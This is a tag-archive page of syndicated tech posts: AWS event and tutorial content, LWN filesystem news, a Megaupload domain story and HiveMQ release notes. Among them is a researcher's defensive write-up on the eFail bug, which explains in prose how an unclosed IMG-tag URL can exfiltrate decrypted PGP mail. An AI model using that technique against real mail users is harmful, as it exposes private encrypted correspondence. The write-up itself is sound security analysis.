Tag Archives: Sessions

[$] Network filesystem topics

Post Syndicated from jake original https://lwn.net/Articles/754506/rss

At the 2018 Linux Storage, Filesystem, and
Memory-Management Summit (LSFMM), Steve French led a discussion of various
problem areas for network filesystems. Unlike previous sessions (in 2016 and 2017), there was some good news to report
because the long-awaited statx()
system call
was released in Linux 4.11. But there
is still plenty of work to be done to better support network filesystems in
Linux.

Connect, collaborate, and learn at AWS Global Summits in 2018

Post Syndicated from Tina Kelleher original https://aws.amazon.com/blogs/big-data/connect-collaborate-and-learn-at-aws-global-summits-in-2018/

Regardless of your career path, there’s no denying that attending industry events can provide helpful career development opportunities — not only for improving and expanding your skill sets, but for networking as well. According to this article from PayScale.com, experts estimate that somewhere between 70-85% of new positions are landed through networking.

Narrowing our focus to networking opportunities with cloud computing professionals who’re working on tackling some of today’s most innovative and exciting big data solutions, attending big data-focused sessions at an AWS Global Summit is a great place to start.

AWS Global Summits are free events that bring the cloud computing community together to connect, collaborate, and learn about AWS. As the name suggests, these summits are held in major cities around the world, and attract technologists from all industries and skill levels who’re interested in hearing from AWS leaders, experts, partners, and customers.

In addition to networking opportunities with top cloud technology providers, consultants and your peers in our Partner and Solutions Expo, you’ll also hone your AWS skills by attending and participating in a multitude of education and training opportunities.

Here’s a brief sampling of some of the upcoming sessions relevant to big data professionals:

May 31st : Big Data Architectural Patterns and Best Practices on AWS | AWS Summit – Mexico City

June 6th-7th: Various (click on the “Big Data & Analytics” header) | AWS Summit – Berlin

June 20-21st : [email protected] | Public Sector Summit – Washington DC

June 21st: Enabling Self Service for Data Scientists with AWS Service Catalog | AWS Summit – Sao Paulo

Be sure to check out the main page for AWS Global Summits, where you can see which cities have AWS Summits planned for 2018, register to attend an upcoming event, or provide your information to be notified when registration opens for a future event.

Some notes on eFail

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/05/some-notes-on-efail.html

I’ve been busy trying to replicate the “eFail” PGP/SMIME bug. I thought I’d write up some notes.

PGP and S/MIME encrypt emails, so that eavesdroppers can’t read them. The bugs potentially allow eavesdroppers to take the encrypted emails they’ve captured and resend them to you, reformatted in a way that allows them to decrypt the messages.

Disable remote/external content in email

The most important defense is to disable “external” or “remote” content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when they want to display images, but not fill up the email with them. But most of the time this is illegitimate, they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and the width/height of this image is set to one pixel, so you don’t even see it:

Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:

The problem is that as you read email messages, you often get frustrated by the fact the error messages and missing content, so you keep adding exceptions:

The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren’t to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn’t matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That’s probably overkill. As long as the attacker can’t use the “remote content” in emails, you are fine. Likewise, some have recommend disabling HTML completely. That’s not even an option in any email client I’ve used — you can disable sending HTML emails, but not receiving them. It’s sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn’t replicate the direct exfiltration

There rare two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like one of those tracking tags), allowing the entire message to be decrypted.

An example of this is the following email. This is a standard HTML email message consisting of multiple parts. The trick is that the IMG tag in the first part starts the URL (blog.robertgraham.com/…) but doesn’t end it. It has the starting quotes in front of the URL but no ending quotes. The ending will in the next chunk.

The next chunk isn’t HTML, though, it’s PGP. The PGP extension (in my case, Enignmail) will detect this and automatically decrypt it. In this case, it’s some previous email message I’ve received the attacker captured by eavesdropping, who then pastes the contents into this email message in order to get it decrypted.

What should happen at this point is that Thunderbird will generate a request (if “remote content” is enabled) to the blog.robertgraham.com server with the decrypted contents of the PGP email appended to it. But that’s not what happens. Instead, I get this:

I am indeed getting weird stuff in the URL (the bit after the GET /), but it’s not the PGP decrypted message. Instead what’s going on is that when Thunderbird puts together a “multipart/mixed” message, it adds it’s own HTML tags consisting of lines between each part. In the email client it looks like this:

The HTML code it adds looks like:

That’s what you see in the above URL, all this code up to the first quotes. Those quotes terminate the quotes in the URL from the first multipart section, causing the rest of the content to be ignored (as far as being sent as part of the URL).

So at least for the latest version of Thunderbird, you are accidentally safe, even if you have “remote content” enabled. Though, this is only according to my tests, there may be a work around to this that hackers could exploit.

STARTTLS

In the old days, email was sent plaintext over the wire so that it could be passively eavesdropped on. Nowadays, most providers send it via “STARTTLS”, which sorta encrypts it. Attackers can still intercept such email, but they have to do so actively, using man-in-the-middle. Such active techniques can be detected if you are careful and look for them.
Some organizations don’t care. Apparently, some nation states are just blocking all STARTTLS and forcing email to be sent unencrypted. Others do care. The NSA will passively sniff all the email they can in nations like Iraq, but they won’t actively intercept STARTTLS messages, for fear of getting caught.
The consequence is that it’s much less likely that somebody has been eavesdropping on you, passively grabbing all your PGP/SMIME emails. If you fear they have been, you should look (e.g. send emails from GMail and see if they are intercepted by sniffing the wire).

You’ll know if you are getting hacked

If somebody attacks you using eFail, you’ll know. You’ll get an email message formatted this way, with multipart/mixed components, some with corrupt HTML, some encrypted via PGP. This means that for the most part, your risk is that you’ll be attacked only once — the hacker will only be able to get one message through and decrypt it before you notice that something is amiss. Though to be fair, they can probably include all the emails they want decrypted as attachments to the single email they sent you, so the risk isn’t necessarily that you’ll only get one decrypted.
As mentioned above, a lot of attackers (e.g. the NSA) won’t attack you if its so easy to get caught. Other attackers, though, like anonymous hackers, don’t care.
Somebody ought to write a plugin to Thunderbird to detect this.

Summary

It only works if attackers have already captured your emails (though, that’s why you use PGP/SMIME in the first place, to guard against that).
It only works if you’ve enabled your email client to automatically grab external/remote content.
It seems to not be easily reproducible in all cases.
Instead of disabling PGP/SMIME, you should make sure your email client hast remote/external content disabled — that’s a huge privacy violation even without this bug.

Notes: The default email client on the Mac enables remote content by default, which is bad:

Analyze Apache Parquet optimized data using Amazon Kinesis Data Firehose, Amazon Athena, and Amazon Redshift

Post Syndicated from Roy Hasson original https://aws.amazon.com/blogs/big-data/analyzing-apache-parquet-optimized-data-using-amazon-kinesis-data-firehose-amazon-athena-and-amazon-redshift/

Amazon Kinesis Data Firehose is the easiest way to capture and stream data into a data lake built on Amazon S3. This data can be anything—from AWS service logs like AWS CloudTrail log files, Amazon VPC Flow Logs, Application Load Balancer logs, and others. It can also be IoT events, game events, and much more. To efficiently query this data, a time-consuming ETL (extract, transform, and load) process is required to massage and convert the data to an optimal file format, which increases the time to insight. This situation is less than ideal, especially for real-time data that loses its value over time.

To solve this common challenge, Kinesis Data Firehose can now save data to Amazon S3 in Apache Parquet or Apache ORC format. These are optimized columnar formats that are highly recommended for best performance and cost-savings when querying data in S3. This feature directly benefits you if you use Amazon Athena, Amazon Redshift, AWS Glue, Amazon EMR, or any other big data tools that are available from the AWS Partner Network and through the open-source community.

Amazon Connect is a simple-to-use, cloud-based contact center service that makes it easy for any business to provide a great customer experience at a lower cost than common alternatives. Its open platform design enables easy integration with other systems. One of those systems is Amazon Kinesis—in particular, Kinesis Data Streams and Kinesis Data Firehose.

What’s really exciting is that you can now save events from Amazon Connect to S3 in Apache Parquet format. You can then perform analytics using Amazon Athena and Amazon Redshift Spectrum in real time, taking advantage of this key performance and cost optimization. Of course, Amazon Connect is only one example. This new capability opens the door for a great deal of opportunity, especially as organizations continue to build their data lakes.

Amazon Connect includes an array of analytics views in the Administrator dashboard. But you might want to run other types of analysis. In this post, I describe how to set up a data stream from Amazon Connect through Kinesis Data Streams and Kinesis Data Firehose and out to S3, and then perform analytics using Athena and Amazon Redshift Spectrum. I focus primarily on the Kinesis Data Firehose support for Parquet and its integration with the AWS Glue Data Catalog, Amazon Athena, and Amazon Redshift.

Solution overview

Here is how the solution is laid out:

 

 

The following sections walk you through each of these steps to set up the pipeline.

1. Define the schema

When Kinesis Data Firehose processes incoming events and converts the data to Parquet, it needs to know which schema to apply. The reason is that many times, incoming events contain all or some of the expected fields based on which values the producers are advertising. A typical process is to normalize the schema during a batch ETL job so that you end up with a consistent schema that can easily be understood and queried. Doing this introduces latency due to the nature of the batch process. To overcome this issue, Kinesis Data Firehose requires the schema to be defined in advance.

To see the available columns and structures, see Amazon Connect Agent Event Streams. For the purpose of simplicity, I opted to make all the columns of type String rather than create the nested structures. But you can definitely do that if you want.

The simplest way to define the schema is to create a table in the Amazon Athena console. Open the Athena console, and paste the following create table statement, substituting your own S3 bucket and prefix for where your event data will be stored. A Data Catalog database is a logical container that holds the different tables that you can create. The default database name shown here should already exist. If it doesn’t, you can create it or use another database that you’ve already created.

CREATE EXTERNAL TABLE default.kfhconnectblog (
  awsaccountid string,
  agentarn string,
  currentagentsnapshot string,
  eventid string,
  eventtimestamp string,
  eventtype string,
  instancearn string,
  previousagentsnapshot string,
  version string
)
STORED AS parquet
LOCATION 's3://your_bucket/kfhconnectblog/'
TBLPROPERTIES ("parquet.compression"="SNAPPY")

That’s all you have to do to prepare the schema for Kinesis Data Firehose.

2. Define the data streams

Next, you need to define the Kinesis data streams that will be used to stream the Amazon Connect events.  Open the Kinesis Data Streams console and create two streams.  You can configure them with only one shard each because you don’t have a lot of data right now.

3. Define the Kinesis Data Firehose delivery stream for Parquet

Let’s configure the Data Firehose delivery stream using the data stream as the source and Amazon S3 as the output. Start by opening the Kinesis Data Firehose console and creating a new data delivery stream. Give it a name, and associate it with the Kinesis data stream that you created in Step 2.

As shown in the following screenshot, enable Record format conversion (1) and choose Apache Parquet (2). As you can see, Apache ORC is also supported. Scroll down and provide the AWS Glue Data Catalog database name (3) and table names (4) that you created in Step 1. Choose Next.

To make things easier, the output S3 bucket and prefix fields are automatically populated using the values that you defined in the LOCATION parameter of the create table statement from Step 1. Pretty cool. Additionally, you have the option to save the raw events into another location as defined in the Source record S3 backup section. Don’t forget to add a trailing forward slash “ / “ so that Data Firehose creates the date partitions inside that prefix.

On the next page, in the S3 buffer conditions section, there is a note about configuring a large buffer size. The Parquet file format is highly efficient in how it stores and compresses data. Increasing the buffer size allows you to pack more rows into each output file, which is preferred and gives you the most benefit from Parquet.

Compression using Snappy is automatically enabled for both Parquet and ORC. You can modify the compression algorithm by using the Kinesis Data Firehose API and update the OutputFormatConfiguration.

Be sure to also enable Amazon CloudWatch Logs so that you can debug any issues that you might run into.

Lastly, finalize the creation of the Firehose delivery stream, and continue on to the next section.

4. Set up the Amazon Connect contact center

After setting up the Kinesis pipeline, you now need to set up a simple contact center in Amazon Connect. The Getting Started page provides clear instructions on how to set up your environment, acquire a phone number, and create an agent to accept calls.

After setting up the contact center, in the Amazon Connect console, choose your Instance Alias, and then choose Data Streaming. Under Agent Event, choose the Kinesis data stream that you created in Step 2, and then choose Save.

At this point, your pipeline is complete.  Agent events from Amazon Connect are generated as agents go about their day. Events are sent via Kinesis Data Streams to Kinesis Data Firehose, which converts the event data from JSON to Parquet and stores it in S3. Athena and Amazon Redshift Spectrum can simply query the data without any additional work.

So let’s generate some data. Go back into the Administrator console for your Amazon Connect contact center, and create an agent to handle incoming calls. In this example, I creatively named mine Agent One. After it is created, Agent One can get to work and log into their console and set their availability to Available so that they are ready to receive calls.

To make the data a bit more interesting, I also created a second agent, Agent Two. I then made some incoming and outgoing calls and caused some failures to occur, so I now have enough data available to analyze.

5. Analyze the data with Athena

Let’s open the Athena console and run some queries. One thing you’ll notice is that when we created the schema for the dataset, we defined some of the fields as Strings even though in the documentation they were complex structures.  The reason for doing that was simply to show some of the flexibility of Athena to be able to parse JSON data. However, you can define nested structures in your table schema so that Kinesis Data Firehose applies the appropriate schema to the Parquet file.

Let’s run the first query to see which agents have logged into the system.

The query might look complex, but it’s fairly straightforward:

WITH dataset AS (
  SELECT 
    from_iso8601_timestamp(eventtimestamp) AS event_ts,
    eventtype,
    -- CURRENT STATE
    json_extract_scalar(
      currentagentsnapshot,
      '$.agentstatus.name') AS current_status,
    from_iso8601_timestamp(
      json_extract_scalar(
        currentagentsnapshot,
        '$.agentstatus.starttimestamp')) AS current_starttimestamp,
    json_extract_scalar(
      currentagentsnapshot, 
      '$.configuration.firstname') AS current_firstname,
    json_extract_scalar(
      currentagentsnapshot,
      '$.configuration.lastname') AS current_lastname,
    json_extract_scalar(
      currentagentsnapshot, 
      '$.configuration.username') AS current_username,
    json_extract_scalar(
      currentagentsnapshot, 
      '$.configuration.routingprofile.defaultoutboundqueue.name') AS               current_outboundqueue,
    json_extract_scalar(
      currentagentsnapshot, 
      '$.configuration.routingprofile.inboundqueues[0].name') as current_inboundqueue,
    -- PREVIOUS STATE
    json_extract_scalar(
      previousagentsnapshot, 
      '$.agentstatus.name') as prev_status,
    from_iso8601_timestamp(
      json_extract_scalar(
        previousagentsnapshot, 
       '$.agentstatus.starttimestamp')) as prev_starttimestamp,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.firstname') as prev_firstname,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.lastname') as prev_lastname,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.username') as prev_username,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.routingprofile.defaultoutboundqueue.name') as current_outboundqueue,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.routingprofile.inboundqueues[0].name') as prev_inboundqueue
  from kfhconnectblog
  where eventtype <> 'HEART_BEAT'
)
SELECT
  current_status as status,
  current_username as username,
  event_ts
FROM dataset
WHERE eventtype = 'LOGIN' AND current_username <> ''
ORDER BY event_ts DESC

The query output looks something like this:

Here is another query that shows the sessions each of the agents engaged with. It tells us where they were incoming or outgoing, if they were completed, and where there were missed or failed calls.

WITH src AS (
  SELECT
     eventid,
     json_extract_scalar(currentagentsnapshot, '$.configuration.username') as username,
     cast(json_extract(currentagentsnapshot, '$.contacts') AS ARRAY(JSON)) as c,
     cast(json_extract(previousagentsnapshot, '$.contacts') AS ARRAY(JSON)) as p
  from kfhconnectblog
),
src2 AS (
  SELECT *
  FROM src CROSS JOIN UNNEST (c, p) AS contacts(c_item, p_item)
),
dataset AS (
SELECT 
  eventid,
  username,
  json_extract_scalar(c_item, '$.contactid') as c_contactid,
  json_extract_scalar(c_item, '$.channel') as c_channel,
  json_extract_scalar(c_item, '$.initiationmethod') as c_direction,
  json_extract_scalar(c_item, '$.queue.name') as c_queue,
  json_extract_scalar(c_item, '$.state') as c_state,
  from_iso8601_timestamp(json_extract_scalar(c_item, '$.statestarttimestamp')) as c_ts,
  
  json_extract_scalar(p_item, '$.contactid') as p_contactid,
  json_extract_scalar(p_item, '$.channel') as p_channel,
  json_extract_scalar(p_item, '$.initiationmethod') as p_direction,
  json_extract_scalar(p_item, '$.queue.name') as p_queue,
  json_extract_scalar(p_item, '$.state') as p_state,
  from_iso8601_timestamp(json_extract_scalar(p_item, '$.statestarttimestamp')) as p_ts
FROM src2
)
SELECT 
  username,
  c_channel as channel,
  c_direction as direction,
  p_state as prev_state,
  c_state as current_state,
  c_ts as current_ts,
  c_contactid as id
FROM dataset
WHERE c_contactid = p_contactid
ORDER BY id DESC, current_ts ASC

The query output looks similar to the following:

6. Analyze the data with Amazon Redshift Spectrum

With Amazon Redshift Spectrum, you can query data directly in S3 using your existing Amazon Redshift data warehouse cluster. Because the data is already in Parquet format, Redshift Spectrum gets the same great benefits that Athena does.

Here is a simple query to show querying the same data from Amazon Redshift. Note that to do this, you need to first create an external schema in Amazon Redshift that points to the AWS Glue Data Catalog.

SELECT 
  eventtype,
  json_extract_path_text(currentagentsnapshot,'agentstatus','name') AS current_status,
  json_extract_path_text(currentagentsnapshot, 'configuration','firstname') AS current_firstname,
  json_extract_path_text(currentagentsnapshot, 'configuration','lastname') AS current_lastname,
  json_extract_path_text(
    currentagentsnapshot,
    'configuration','routingprofile','defaultoutboundqueue','name') AS current_outboundqueue,
FROM default_schema.kfhconnectblog

The following shows the query output:

Summary

In this post, I showed you how to use Kinesis Data Firehose to ingest and convert data to columnar file format, enabling real-time analysis using Athena and Amazon Redshift. This great feature enables a level of optimization in both cost and performance that you need when storing and analyzing large amounts of data. This feature is equally important if you are investing in building data lakes on AWS.

 


Additional Reading

If you found this post useful, be sure to check out Analyzing VPC Flow Logs with Amazon Kinesis Firehose, Amazon Athena, and Amazon QuickSight and Work with partitioned data in AWS Glue.


About the Author

Roy Hasson is a Global Business Development Manager for AWS Analytics. He works with customers around the globe to design solutions to meet their data processing, analytics and business intelligence needs. Roy is big Manchester United fan cheering his team on and hanging out with his family.

 

 

 

Iconic Megaupload.com Domain Has a New Owner

Post Syndicated from Ernesto original https://torrentfreak.com/iconic-megaupload-com-domain-has-a-new-owner-180509/

Following the 2012 raid on Megaupload and Kim Dotcom, U.S. and New Zealand authorities seized millions of dollars in cash and other property, located around the world.

Claiming the assets were obtained through copyright and money laundering crimes, the U.S. government launched separate civil cases in which it asked the court to forfeit a wide variety of seized possessions of the Megaupload defendants.

One of these cases was lost after the U.S. branded Dotcom and his colleagues as “fugitives”.The defense team appealed the ruling, but lost again, and a subsequent petition at the Supreme Court was denied.

As a result, Dotcom had to leave behind several bank accounts and servers, as well as all hope of getting some of his dearly treasured domain names back. This includes the most valuable domain of all, Megaupload.com.

The forfeiture was made final earlier this year but since then little was known about the fate of the domain names. This week, however, it became clear that the US Government didn’t plan to hold on to it, as Megaupload.com now has a new owner.

According to the latest Whois information, which was updated late last week, RegistrarAds Inc is now the official Megaupload.com owner. This previously was Megaupload Limited, under FBI control.

New owner

RegistrarAds is a company based in Vancouver, Washington, which specializes in buying domain names. While we could not find a corporate website, the web is littered with domain disputes and other references to domain name issues.

Michelin North America, for example, filed a complaint against RegistrarAds because it registered the michelin-group.com domain, witch success. Similarly, the California Milk Processor Board, most famous for its Got Milk? ads, won a WIPO domain dispute over gotpuremilk.com.

How RegistrarAds obtained the Megaupload domain name isn’t entirely clear. It wasn’t dropped by the registry, but it might be possible that it was scooped up in an auction. Theoretically, the US Government could have sold it too, but we see no evidence for that.

It’s also unknown what the company’s plans are for Megaupload.com. However, given the company’s track record it’s unlikely that it will do anything file-sharing related. The domain hasn’t updated its nameservers yet and remains unreachable at the time of writing.

TorrentFreak reached out to RegistrarAds, hoping to find out more, but we have yet to hear back.

Megaupload.com is not the only domain that changed owners recently. The same happened to Megaclick.com, which is now registered to Buydomains.com. Several of the other seized Megaupload domain names remain in possession of US authorities, for now.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

AWS Online Tech Talks – May and Early June 2018

Post Syndicated from Devin Watson original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-may-and-early-june-2018/

AWS Online Tech Talks – May and Early June 2018  

Join us this month to learn about some of the exciting new services and solution best practices at AWS. We also have our first re:Invent 2018 webinar series, “How to re:Invent”. Sign up now to learn more, we look forward to seeing you.

Note – All sessions are free and in Pacific Time.

Tech talks featured this month:

Analytics & Big Data

May 21, 2018 | 11:00 AM – 11:45 AM PT Integrating Amazon Elasticsearch with your DevOps Tooling – Learn how you can easily integrate Amazon Elasticsearch Service into your DevOps tooling and gain valuable insight from your log data.

May 23, 2018 | 11:00 AM – 11:45 AM PTData Warehousing and Data Lake Analytics, Together – Learn how to query data across your data warehouse and data lake without moving data.

May 24, 2018 | 11:00 AM – 11:45 AM PTData Transformation Patterns in AWS – Discover how to perform common data transformations on the AWS Data Lake.

Compute

May 29, 2018 | 01:00 PM – 01:45 PM PT – Creating and Managing a WordPress Website with Amazon Lightsail – Learn about Amazon Lightsail and how you can create, run and manage your WordPress websites with Amazon’s simple compute platform.

May 30, 2018 | 01:00 PM – 01:45 PM PTAccelerating Life Sciences with HPC on AWS – Learn how you can accelerate your Life Sciences research workloads by harnessing the power of high performance computing on AWS.

Containers

May 24, 2018 | 01:00 PM – 01:45 PM PT – Building Microservices with the 12 Factor App Pattern on AWS – Learn best practices for building containerized microservices on AWS, and how traditional software design patterns evolve in the context of containers.

Databases

May 21, 2018 | 01:00 PM – 01:45 PM PTHow to Migrate from Cassandra to Amazon DynamoDB – Get the benefits, best practices and guides on how to migrate your Cassandra databases to Amazon DynamoDB.

May 23, 2018 | 01:00 PM – 01:45 PM PT5 Hacks for Optimizing MySQL in the Cloud – Learn how to optimize your MySQL databases for high availability, performance, and disaster resilience using RDS.

DevOps

May 23, 2018 | 09:00 AM – 09:45 AM PT.NET Serverless Development on AWS – Learn how to build a modern serverless application in .NET Core 2.0.

Enterprise & Hybrid

May 22, 2018 | 11:00 AM – 11:45 AM PTHybrid Cloud Customer Use Cases on AWS – Learn how customers are leveraging AWS hybrid cloud capabilities to easily extend their datacenter capacity, deliver new services and applications, and ensure business continuity and disaster recovery.

IoT

May 31, 2018 | 11:00 AM – 11:45 AM PTUsing AWS IoT for Industrial Applications – Discover how you can quickly onboard your fleet of connected devices, keep them secure, and build predictive analytics with AWS IoT.

Machine Learning

May 22, 2018 | 09:00 AM – 09:45 AM PTUsing Apache Spark with Amazon SageMaker – Discover how to use Apache Spark with Amazon SageMaker for training jobs and application integration.

May 24, 2018 | 09:00 AM – 09:45 AM PTIntroducing AWS DeepLens – Learn how AWS DeepLens provides a new way for developers to learn machine learning by pairing the physical device with a broad set of tutorials, examples, source code, and integration with familiar AWS services.

Management Tools

May 21, 2018 | 09:00 AM – 09:45 AM PTGaining Better Observability of Your VMs with Amazon CloudWatch – Learn how CloudWatch Agent makes it easy for customers like Rackspace to monitor their VMs.

Mobile

May 29, 2018 | 11:00 AM – 11:45 AM PT – Deep Dive on Amazon Pinpoint Segmentation and Endpoint Management – See how segmentation and endpoint management with Amazon Pinpoint can help you target the right audience.

Networking

May 31, 2018 | 09:00 AM – 09:45 AM PTMaking Private Connectivity the New Norm via AWS PrivateLink – See how PrivateLink enables service owners to offer private endpoints to customers outside their company.

Security, Identity, & Compliance

May 30, 2018 | 09:00 AM – 09:45 AM PT – Introducing AWS Certificate Manager Private Certificate Authority (CA) – Learn how AWS Certificate Manager (ACM) Private Certificate Authority (CA), a managed private CA service, helps you easily and securely manage the lifecycle of your private certificates.

June 1, 2018 | 09:00 AM – 09:45 AM PTIntroducing AWS Firewall Manager – Centrally configure and manage AWS WAF rules across your accounts and applications.

Serverless

May 22, 2018 | 01:00 PM – 01:45 PM PTBuilding API-Driven Microservices with Amazon API Gateway – Learn how to build a secure, scalable API for your application in our tech talk about API-driven microservices.

Storage

May 30, 2018 | 11:00 AM – 11:45 AM PTAccelerate Productivity by Computing at the Edge – Learn how AWS Snowball Edge support for compute instances helps accelerate data transfers, execute custom applications, and reduce overall storage costs.

June 1, 2018 | 11:00 AM – 11:45 AM PTLearn to Build a Cloud-Scale Website Powered by Amazon EFS – Technical deep dive where you’ll learn tips and tricks for integrating WordPress, Drupal and Magento with Amazon EFS.

 

 

 

 

What’s new in HiveMQ 3.4

Post Syndicated from The HiveMQ Team original https://www.hivemq.com/whats-new-in-hivemq-3-4

We are pleased to announce the release of HiveMQ 3.4. This version of HiveMQ is the most resilient and advanced version of HiveMQ ever. The main focus in this release was directed towards addressing the needs for the most ambitious MQTT deployments in the world for maximum performance and resilience for millions of concurrent MQTT clients. Of course, deployments of all sizes can profit from the improvements in the latest and greatest HiveMQ.

This version is a drop-in replacement for HiveMQ 3.3 and of course supports rolling upgrades with zero-downtime.

HiveMQ 3.4 brings many features that your users, administrators and plugin developers are going to love. These are the highlights:

 

New HiveMQ 3.4 features at a glance

Cluster

HiveMQ 3.4 brings various improvements in terms of scalability, availability, resilience and observability for the cluster mechanism. Many of the new features remain under the hood, but several additions stand out:

Cluster Overload Protection

The new version has a first-of-its-kind Cluster Overload Protection. The whole cluster is able to spot MQTT clients that cause overload on nodes or the cluster as a whole and protects itself from the overload. This mechanism also protects the deployment from cascading failures due to slow or failing underlying hardware (as sometimes seen on cloud providers). This feature is enabled by default and you can learn more about the mechanism in our documentation.

Dynamic Replicates

HiveMQ’s sophisticated cluster mechanism is able to scale in a linear fashion due to extremely efficient and true data distribution mechanics based on a configured replication factor. The most important aspect of every cluster is availability, which is achieved by having eventual consistency functions in place for edge cases. The 3.4 version adds dynamic replicates to the cluster so even the most challenging edge cases involving network splits don’t lead to the sacrifice of consistency for the most important MQTT operations.

Node Stress Level Metrics

All MQTT cluster nodes are now aware of their own stress level and the stress levels of other cluster members. While all stress mitigation is handled internally by HiveMQ, experienced operators may want to monitor the individual node’s stress level (e.g with Grafana) in order to start investigating what caused the increase of load.

WebUI

Operators worldwide love the HiveMQ WebUI introduced with HiveMQ 3.3. We gathered all the fantastic feedback from our users and polished the WebUI, so it’s even more useful for day-to-day broker operations and remote debugging of MQTT clients. The most important changes and additions are:

Trace Recording Download

The unique Trace Recordings functionality is without doubt a lifesaver when the behavior of individual MQTT clients needs further investigation as all interactions with the broker can be traced — at runtime and at scale! Huge production deployments may accumulate multiple gigabytes of trace recordings. HiveMQ now offers a convenient way to collect all trace recordings from all nodes, zips them and allows the download via a simple button on the WebUI. Remote debugging was never easier!

Additional Client Detail Information in WebUI

The mission of the HiveMQ WebUI is to provide easy insights to the whole production MQTT cluster for operators and administrators. Individual MQTT client investigations are a piece of cake, as all available information about clients can be viewed in detail. We further added the ability to view the restrictions a concrete client has:

  • Maximum Inflight Queue Size
  • Client Offline Queue Messages Size
  • Client Offline Message Drop Strategy

Session Invalidation

MQTT persistent sessions are one of the outstanding features of the MQTT protocol specification. Sessions which do not expire but are never reused unnecessarily consume disk space and memory. Administrators can now invalidate individual session directly in the HiveMQ WebUI for client sessions, which can be deleted safely. HiveMQ 3.4 will take care and release the resources on all cluster nodes after a session was invalidated

Web UI Polishing

Most texts on the WebUI were revisited and are now clearer and crisper. The help texts also received a major overhaul and should now be more, well, helpful. In addition, many small improvements were added, which are most of the time invisible but are here to help when you need them most. For example, the WebUI now displays a warning if cluster nodes with old versions are in the cluster (which may happen if a rolling upgrade was not finished properly)

Plugin System

One of the most popular features of HiveMQ is the extensive Plugin System, which virtually enables the integration of HiveMQ to any system and allows hooking into all aspects of the MQTT lifecycle. We listened to the feedback and are pleased to announce many improvements, big and small, for the Plugin System:

Client Session Time-to-live for individual clients

HiveMQ 3.3 offered a global configuration for setting the Time-To-Live for MQTT sessions. With the advent of HiveMQ 3.4, users can now programmatically set Time-To-Live values for individual MQTT clients and can discard a MQTT session immediately.

Individual Inflight Queues

While the Inflight Queue configuration is typically sufficient in the HiveMQ default configuration, there are some use cases that require the adjustment of this configuration. It’s now possible to change the Inflight Queue size for individual clients via the Plugin System.
 
 

Plugin Service Overload Protection

The HiveMQ Plugin System is a power-user tool and it’s possible to do unbelievably useful modifications as well as putting major stress on the system as a whole if the programmer is not careful. In order to protect the HiveMQ instances from accidental overload, a Plugin Service Overload Protection can be configured. This rate limits the Plugin Service usage and gives feedback to the application programmer in case the rate limit is exceeded. This feature is disabled by default but we strongly recommend updating your plugins to profit from this feature.

Session Attribute Store putIfNewer

This is one of the small bits you almost never need but when you do, you’re ecstatic for being able to use it. The Session Attribute Store now offers methods to put values, if the values you want to put are newer or fresher than the values already written. This is extremely useful, if multiple cluster nodes want to write to the Session Attribute Store simultaneously, as this guarantees that outdated values can no longer overwrite newer values.
 
 
 
 

Disconnection Timestamp for OnDisconnectCallback

As the OnDisconnectCallback is executed asynchronously, the client might already be gone when the callback is executed. It’s now easy to obtain the exact timestamp when a MQTT client disconnected, even if the callback is executed later on. This feature might be very interesting for many plugin developers in conjunction with the Session Attribute Store putIfNewer functionality.

Operations

We ❤️ Operators and we strive to provide all the tools needed for operating and administrating a MQTT broker cluster at scale in any environment. A key strategy for successful operations of any system is monitoring. We added some interesting new metrics you might find useful.

System Metrics

In addition to JVM Metrics, HiveMQ now also gathers Operating System Metrics for Linux Systems. So HiveMQ is able to see for itself how the operating system views the process, including native memory, the real CPU usage, and open file usage. These metrics are particularly useful, if you don’t have a monitoring agent for Linux systems setup. All metrics can be found here.

Client Disconnection Metrics

The reality of many MQTT scenarios is that not all clients are able to disconnect gracefully by sending MQTT DISCONNECT messages. HiveMQ now also exposes metrics about clients that disconnected by closing the TCP connection instead of sending a DISCONNECT packet first. This is especially useful for monitoring, if you regularly deal with clients that don’t have a stable connection to the MQTT brokers.

 

JMX enabled by default

JMX, the Java Monitoring Extension, is now enabled by default. Many HiveMQ operators use Application Performance Monitoring tools, which are able to hook into the metrics via JMX or use plain JMX for on-the-fly debugging. While we recommend to use official off-the-shelf plugins for monitoring, it’s now easier than ever to just use JMX if other solutions are not available to you.

Other notable improvements

The 3.4 release of HiveMQ is full of hidden gems and improvements. While it would be too much to highlight all small improvements, these notable changes stand out and contribute to the best HiveMQ release ever.

Topic Level Distribution Configuration

Our recommendation for all huge deployments with millions of devices is: Start with separate topic prefixes by bringing the dynamic topic parts directly to the beginning. The reality is that many customers have topics that are constructed like the following: “devices/{deviceId}/status”. So what happens is that all topics in this example start with a common prefix, “devices”, which is the first topic level. Unfortunately the first topic level doesn’t include a dynamic topic part. In order to guarantee the best scalability of the cluster and the best performance of the topic tree, customers can now configure how many topic levels are used for distribution. In the example outlined here, a topic level distribution of 2 would be perfect and guarantees the best scalability.

Mass disconnect performance improvements

Mass disconnections of MQTT clients can happen. This might be the case when e.g. a load balancer in front of the MQTT broker cluster drops the connections or if a mobile carrier experiences connectivity problems. Prior to HiveMQ 3.4, mass disconnect events caused stress on the cluster. Mass disconnect events are now massively optimized and even tens of millions of connection losses at the same time won’t bring the cluster into stress situations.

 
 
 
 
 
 

Replication Performance Improvements

